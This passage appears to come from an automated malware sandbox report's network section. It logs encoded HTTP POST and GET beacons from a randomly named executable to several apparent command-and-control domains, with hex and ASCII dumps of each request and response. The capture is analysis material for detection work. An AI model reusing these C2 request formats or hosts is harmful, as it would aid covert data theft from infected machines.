                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 57 66 50 50 34 51 55 54 53 34 34 6d 33 2f 41 35 61 51 73 55 7a 6a 63 53 6b 4d 4c 36 69 4b 4c 31 36 55 79 74 50 4a 2f 72 34 63 45 6d 55 76 75 63 68 68 45 48 2f 43 71 58 37 35 4a 72 50 4f 64 45 48 4d 31 47 46 79 69 64 6a 45 57 43 49 66 6e 2b 7a 78 56 32 69 70 56 62 70 4c 79 78 4d 42 34 31 73 44 2f 6c 44 35 30 32 55 79 72 6c 71 4a 67 50 2f 6f 4c 6f 44 72 48 49 68 6e 4b 4c 31 31 46 66 65 63 7a 54 44 75 34 64 4e 56 59 38 4b 39 32 4d 59 4f 54 66 58 79 55 56 50 6d 65 4c 4d 47 30 5a 6e 4c 46 35 2b 65 53 78 69 5a 2f 48 46 68 73 64 6f 51 64 49 6f 77 70 76 47 53 6b 78 37 56 37 6b 62 42 72 5a 62 67 6a 2f 70 39 73 7a 76 2b 73 6b 54 34 76 6a 71 55 65 34 4a 6f 57 72 6f 76 48 35 53 70 4f 31 45 6b 41 47 30 35 50 47 6c 71 56 6a 64 38 4d 45 56 64 6a 57 76 5a 71 68 54 5a 2f 78 69 51 50 34 34 6a 47 66 30 70 47 6a 33 61 6f 31 4b 66 48 54 37 77 45 72 56 45 4c 39 51 63 4b 6d 6a 62 6a 63 4f 63 49 78 63 65 32 41 76 73 32 57 32 70 52 79 6c 58 49 37 55 66 34 73 52 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=BIXlFUIVf85iWfPP4QUTS44m3/A5aQsUzjcSkML6iKL16UytPJ/r4cEmUvuchhEH/CqX75JrPOdEHM1GFyidjEWCIfn+zxV2ipVbpLyxMB41sD/lD502UyrlqJgP/oLoDrHIhnKL11FfeczTDu4dNVY8K92MYOTfXyUVPmeLMG0ZnLF5+eSxiZ/HFhsdoQdIowpvGSkx7V7kbBrZbgj/p9szv+skT4vjqUe4JoWrovH5SpO1EkAG05PGlqVjd8MEVdjWvZqhTZ/xiQP44jGf0pGj3ao1KfHT7wErVEL9QcKmjbjcOcIxce2Avs2W2pRylXI7Uf4sRMoPqcTsRPF9XcYXdhRJCYlQ8LOVI70SzPb49XAuzddt9jKDiJ6S5uZRj69gQZuAYx4beWkKVsdzvHRK2+vfzccxcbeethKADg/VuCQkzJ4HhaS9NsDofC/9znRSaiZbX5Kb1WLk80yIvGQ9ZQT2VEJnfUNZsqTftBNs/9V/nwZHMChLcankrOWtK3zdwY4RXnYa/V1qjN8maa6KYdjQYy89qCUmaOLsuT3293MmqBiWwdx/0aqtpETOG4UB2miURdCNv8q5X7oL+ycPUukHu31Wy1fhiao+O5ebtxafEGj1tNydIeznNuD68tpGf8UPuzeEt0FPZ0yNm5K38GGFoyomIdSI6KU2MXStcjdSTnJlBF9KOyJRzUqJZZkOB5/4JesW4WXblkt77WA25J11R+Z1R6PSgiBp31rCX6t/C//FEg1Q9c67ltp7C/kOTLbWLvTvnp0okzqpOrgGzRR1BXaM3JmoYGItXfRvrhCjjQdI13W/SeYZBRzCu6wSjlC7HDkbJsKYTo0zediikki4h2cqFyL7ZL88C2J2cYEG+epuSCglZMNqPFY4uerQpECHpfz+JCtbfry6uJjwyKTTSnB5INc0OarXSZhQCukynCUKkc47x4HESbBRZbr55SrNl3LWnGY9peINgvdvsTQhHuNbz5EQBJ/lMH6 [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.849712103.249.106.91805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:43:51.906380892 CET516OUTGET /1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.8600228.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:43:53.418690920 CET528INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:43:53 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 31 34 38 0d 0a 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 22 3e e5 8a a0 e8 bd bd e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90 8e 2e 2e 2e 2e 2e 2e 3c 2f 70 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 2c 63 6b 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 66 79 65 72 2e 63 6f 6d 3f 69 64 3d 38 34 35 36 32 22 20 2f 3e 0d 0a 30 0d 0a [TRUNCATED]
                                                                    Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.84971413.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:43:59.283620119 CET777OUTPOST /p9ni/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.remedies.pro
                                                                    Origin: http://www.remedies.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.remedies.pro/p9ni/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 59 68 50 33 4c 31 38 4e 2b 70 68 65 71 56 34 71 45 49 68 77 6f 35 46 4f 2f 52 35 33 6b 77 64 50 52 46 32 30 52 61 34 37 66 76 53 77 32 61 77 48 6e 4e 66 74 4c 6a 61 35 72 71 51 31 52 67 53 6b 6a 58 57 37 6a 52 32 6c 58 73 4c 61 50 65 52 37 6b 35 55 47 44 75 44 6e 73 46 34 34 50 2f 76 74 4f 46 45 76 6d 65 56 79 63 74 7a 78 64 67 41 2b 6a 58 31 33 78 34 43 76 73 62 58 52 47 4c 78 75 74 52 6f 75 70 49 58 42 72 37 55 51 4c 32 56 37 46 33 49 77 6c 4d 65 72 55 4f 65 47 55 36 38 6d 74 41 73 79 64 4e 78 75 58 49 49 4b 34 6d 77 54 39 46 54 4b 54 4e 78 36 33 64 51 4a 54 50 63 34 37 48 33 47 6d 71 73 3d
                                                                    Data Ascii: dpy4vDKP=YhP3L18N+pheqV4qEIhwo5FO/R53kwdPRF20Ra47fvSw2awHnNftLja5rqQ1RgSkjXW7jR2lXsLaPeR7k5UGDuDnsF44P/vtOFEvmeVyctzxdgA+jX13x4CvsbXRGLxutRoupIXBr7UQL2V7F3IwlMerUOeGU68mtAsydNxuXIIK4mwT9FTKTNx63dQJTPc47H3Gmqs=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.84971513.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:01.950649977 CET797OUTPOST /p9ni/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.remedies.pro
                                                                    Origin: http://www.remedies.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.remedies.pro/p9ni/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 59 68 50 33 4c 31 38 4e 2b 70 68 65 72 78 45 71 47 70 68 77 71 5a 46 4e 78 78 35 33 32 77 64 44 52 46 79 30 52 66 64 6d 66 64 6d 77 31 2f 4d 48 6d 4d 66 74 4f 6a 61 35 6a 4b 51 30 56 67 53 2f 6a 57 72 4d 6a 55 4f 6c 58 73 66 61 50 66 68 37 6b 76 63 48 43 2b 44 6c 30 31 34 36 41 66 76 74 4f 46 45 76 6d 65 52 55 63 74 62 78 63 51 77 2b 78 6a 42 6f 79 34 44 64 39 62 58 52 43 4c 77 6e 74 52 6f 32 70 4b 7a 6e 72 2b 51 51 4c 33 6c 37 4c 46 77 7a 76 4d 65 70 4a 2b 66 4f 54 5a 4d 72 69 42 51 57 51 4c 39 63 66 2b 38 56 30 77 42 35 6e 6e 62 4d 51 4e 5a 52 33 65 34 2f 57 34 42 51 68 6b 6e 32 34 39 34 72 6f 57 4d 4f 30 49 43 62 30 73 6c 61 54 6a 44 70 43 78 66 44
                                                                    Data Ascii: dpy4vDKP=YhP3L18N+pherxEqGphwqZFNxx532wdDRFy0Rfdmfdmw1/MHmMftOja5jKQ0VgS/jWrMjUOlXsfaPfh7kvcHC+Dl0146AfvtOFEvmeRUctbxcQw+xjBoy4Dd9bXRCLwntRo2pKznr+QQL3l7LFwzvMepJ+fOTZMriBQWQL9cf+8V0wB5nnbMQNZR3e4/W4BQhkn2494roWMO0ICb0slaTjDpCxfD


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.84971613.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:04.614829063 CET1814OUTPOST /p9ni/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.remedies.pro
                                                                    Origin: http://www.remedies.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.remedies.pro/p9ni/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 59 68 50 33 4c 31 38 4e 2b 70 68 65 72 78 45 71 47 70 68 77 71 5a 46 4e 78 78 35 33 32 77 64 44 52 46 79 30 52 66 64 6d 66 64 65 77 32 4e 30 48 6e 72 4c 74 4a 6a 61 35 74 71 51 78 56 67 54 2f 6a 58 44 49 6a 55 4c 59 58 76 6e 61 4e 39 70 37 31 71 38 48 4c 2b 44 6c 6f 46 34 2f 50 2f 75 6e 4f 46 56 6d 6d 65 42 55 63 74 62 78 63 57 30 2b 68 6e 31 6f 30 34 43 76 73 62 58 46 47 4c 77 50 74 53 59 49 70 4b 6e 52 72 4e 59 51 4c 58 31 37 48 57 49 7a 31 4d 65 76 5a 75 66 2f 54 5a 42 72 69 43 6b 38 51 4c 67 42 66 35 51 56 78 31 34 7a 69 57 32 62 53 4c 31 6a 35 73 42 63 52 49 74 54 6e 55 37 4d 36 76 51 45 69 32 42 36 33 35 4c 62 2f 50 6b 53 4b 31 7a 39 50 45 6a 4e 51 45 30 76 43 41 6b 63 4a 6c 34 45 36 63 6a 31 6d 67 4b 5a 69 62 41 48 43 38 33 39 4b 7a 35 6a 46 6a 4d 52 71 77 34 43 68 4a 63 70 6d 43 2b 36 52 6a 36 61 70 31 69 43 4c 4f 61 70 61 30 2b 53 4a 2f 4e 51 4a 35 41 7a 46 34 36 69 6b 34 52 65 78 78 37 6c 6c 6a 57 37 44 6d 45 39 45 30 58 53 36 4b 32 5a 55 4c 4d 4c 2f 73 32 30 45 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=YhP3L18N+pherxEqGphwqZFNxx532wdDRFy0Rfdmfdew2N0HnrLtJja5tqQxVgT/jXDIjULYXvnaN9p71q8HL+DloF4/P/unOFVmmeBUctbxcW0+hn1o04CvsbXFGLwPtSYIpKnRrNYQLX17HWIz1MevZuf/TZBriCk8QLgBf5QVx14ziW2bSL1j5sBcRItTnU7M6vQEi2B635Lb/PkSK1z9PEjNQE0vCAkcJl4E6cj1mgKZibAHC839Kz5jFjMRqw4ChJcpmC+6Rj6ap1iCLOapa0+SJ/NQJ5AzF46ik4Rexx7lljW7DmE9E0XS6K2ZULML/s20E5AehM5zxvCEUbXO+UNWqRTZybfR9/o20gOdbUJTPIbXeDd7S6N+ypIets9Ag8WiIOncviyaLOQ20WthWST0RcX1AuEu7POK3sb1p9MuI82gcj7VSzspKTfhjJsHmI04TrTjllhj0SVb7Kf/VsVahahzammPnWau3/0nR/onmPwV77vYVp8ykQYcQ9Shgy5vAuQJMITbsN0Pz294oPnjF47a+cyaKLa52OkFrPuXYD5Rk9xupVmzKxZf2leoYccpGJN4znL1InFj85MIkwJ70Y48WjpYoyGVX9EK5coWJeQZYqL5GpZ8G7fjEC39yz5QiOetSDef095rOXMer6NRRghZ5Y1vXN01aaId2OULA2RfGOpVhzgP55euKeDDJ0n/efYUgLgVruaaxl4LfGZJM4s41e4b/WaXAhaK7oJmK9+6PaMcid5kvY43gvD/WisE4BT+CcrOHq+L6/02AGMU7sNS4+z0AtZqqGPTdP7ReAy136Nl8/xSN0s7q2rqQiuwbsjv8rbWJfu3dFuu4HUp4OXBfF22no6tbuLIxyLDd2PDp+E/blZam8KFBtiU0ZEerJIw3Td9DD2BpMZ9h78a/GQ0389+TcS0dYSw7qhPr6z2O2C8Ayk13Vdur4HE3z0joY4ozc62P7rm+3IVMyv6OWrEGcYAloTqhuu [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.84971713.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:07.274946928 CET517OUTGET /p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.remedies.pro
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:44:08.367788076 CET409INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 05 Dec 2024 08:44:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 269
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 38 3d 65 72 65 70 61 30 61 48 67 26 64 70 79 34 76 44 4b 50 3d 56 6a 6e 58 49 43 5a 75 33 62 39 30 6b 7a 46 6d 46 34 4a 32 75 59 67 6f 2b 41 42 6c 39 78 78 68 4c 43 4f 4a 54 4f 6c 70 53 4e 6a 77 2f 76 64 4f 76 63 37 77 4c 53 76 78 6e 34 52 52 62 53 2b 46 72 56 36 38 69 54 4f 6a 64 50 48 72 56 39 30 59 39 49 42 4f 46 70 72 76 6a 56 59 65 50 38 69 43 66 43 68 4d 6d 2b 4e 50 58 65 36 54 58 69 78 6b 72 7a 4a 63 38 63 32 4b 67 5a 6d 45 44 5a 35 67 33 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g=="}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.849718195.110.124.133805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:14.284224987 CET804OUTPOST /io9k/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.officinadelpasso.shop
                                                                    Origin: http://www.officinadelpasso.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.officinadelpasso.shop/io9k/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 45 51 33 4b 4e 35 4a 32 69 34 53 6d 47 52 50 6c 47 62 5a 54 4f 73 62 6d 30 71 59 49 63 6c 51 78 46 71 53 4a 64 6b 4d 34 67 68 35 75 7a 6f 50 58 4e 54 71 69 71 62 42 62 62 6f 76 77 48 2f 6f 6e 50 34 50 72 4d 69 34 2f 41 69 30 72 72 57 45 66 50 6b 65 78 30 73 2f 4f 41 42 53 67 63 62 62 53 4b 52 45 74 30 63 56 62 4c 6a 4c 65 47 59 51 68 34 69 37 4a 4a 73 34 68 65 2b 73 30 68 73 34 33 45 67 7a 4c 4b 55 67 74 6d 78 6b 4a 37 2f 7a 56 78 50 4d 72 71 76 79 54 48 4e 38 79 46 55 73 71 4f 31 64 79 6d 49 68 78 51 4e 58 6e 2f 4b 33 73 43 78 78 56 4d 4d 76 57 41 55 75 56 42 48 49 51 32 55 6e 67 34 74 4d 3d
                                                                    Data Ascii: dpy4vDKP=EQ3KN5J2i4SmGRPlGbZTOsbm0qYIclQxFqSJdkM4gh5uzoPXNTqiqbBbbovwH/onP4PrMi4/Ai0rrWEfPkex0s/OABSgcbbSKREt0cVbLjLeGYQh4i7JJs4he+s0hs43EgzLKUgtmxkJ7/zVxPMrqvyTHN8yFUsqO1dymIhxQNXn/K3sCxxVMMvWAUuVBHIQ2Ung4tM=
                                                                    Dec 5, 2024 09:44:15.567703962 CET367INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:15 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.849719195.110.124.133805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:16.955539942 CET824OUTPOST /io9k/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.officinadelpasso.shop
                                                                    Origin: http://www.officinadelpasso.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.officinadelpasso.shop/io9k/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 45 51 33 4b 4e 35 4a 32 69 34 53 6d 48 79 48 6c 42 36 5a 54 4c 4d 62 6c 6f 36 59 49 4b 56 51 31 46 71 4f 4a 64 6c 34 57 67 53 64 75 77 4a 2f 58 4d 58 65 69 74 62 42 62 44 59 76 70 4a 66 6f 67 50 34 53 57 4d 67 38 2f 41 69 77 72 72 54 34 66 49 56 65 79 30 38 2f 4d 4d 68 53 69 59 62 62 53 4b 52 45 74 30 63 42 78 4c 6e 6e 65 47 73 55 68 36 44 37 4f 58 38 35 54 49 4f 73 30 32 38 34 7a 45 67 7a 70 4b 56 39 4b 6d 7a 63 4a 37 39 37 56 2f 2b 4d 30 6b 76 79 4a 4b 74 39 6a 55 68 5a 6e 49 47 4a 63 39 6f 74 70 4f 37 50 66 2b 38 47 47 59 54 35 54 50 4d 48 39 41 58 47 6a 45 77 56 34 73 33 33 51 6d 36 61 6c 58 5a 43 44 7a 6c 38 4c 55 4c 5a 46 6b 58 6b 76 69 51 50 70
                                                                    Data Ascii: dpy4vDKP=EQ3KN5J2i4SmHyHlB6ZTLMblo6YIKVQ1FqOJdl4WgSduwJ/XMXeitbBbDYvpJfogP4SWMg8/AiwrrT4fIVey08/MMhSiYbbSKREt0cBxLnneGsUh6D7OX85TIOs0284zEgzpKV9KmzcJ797V/+M0kvyJKt9jUhZnIGJc9otpO7Pf+8GGYT5TPMH9AXGjEwV4s33Qm6alXZCDzl8LULZFkXkviQPp
                                                                    Dec 5, 2024 09:44:18.244738102 CET367INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 08:44:18 GMT
                                                                    Server: Apache
                                                                    Content-Length: 203
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.849720195.110.124.133805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:19.623923063 CET1841OUTPOST /io9k/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.officinadelpasso.shop
                                                                    Origin: http://www.officinadelpasso.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.officinadelpasso.shop/io9k/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
